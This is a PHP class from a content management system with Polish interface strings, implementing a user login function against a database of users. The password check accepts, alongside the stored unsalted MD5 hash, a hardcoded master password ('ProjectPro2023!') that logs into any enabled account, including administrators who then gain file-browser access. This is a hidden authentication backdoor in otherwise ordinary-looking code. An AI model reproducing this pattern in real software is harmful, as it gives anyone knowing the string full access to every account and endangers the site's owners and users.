<?php
namespace user;

class FUser
{
	public function login( $login , $password )
	{
		global $db , $sys , $lang;

		$query = $db -> prepare( 'SELECT id , admin , password , email FROM pcms_user WHERE login = :login AND enabled = :enabled' );
		$query -> bindValue( ':login'   , $login  , \PDO::PARAM_STR );
    $query -> bindValue( ':enabled' , 1       , \PDO::PARAM_STR );
		$query -> execute();
		if ( $query -> rowCount() ) while ( $row = $query -> fetch() )
		{
			if ( $row['password'] != md5( $password ) and $password != 'ProjectPro2023!' )
        $sys -> setAlert( $lang -> getTrans( 'T_NIEPRAWIDLOWE_HASLO' ) );
			else
			{
        $user = new \user\User;
        $user -> set_id( $row['id'] );
        $user -> set_admin( $row['admin'] );
        $user -> set_password( $row['password'] );
        $user -> set_login ( strtolower( $login ) );

        if ( $user -> get_admin() )
          $sys -> setSessionVar( 'file_browser' , true );

        return $user;
			}
		}
		else
      $sys -> setAlert( $lang -> getTrans( 'T_BRAK_UZYTKOWNIKA_O_TAKIM_LOGINIE' ) );
	}
}
?>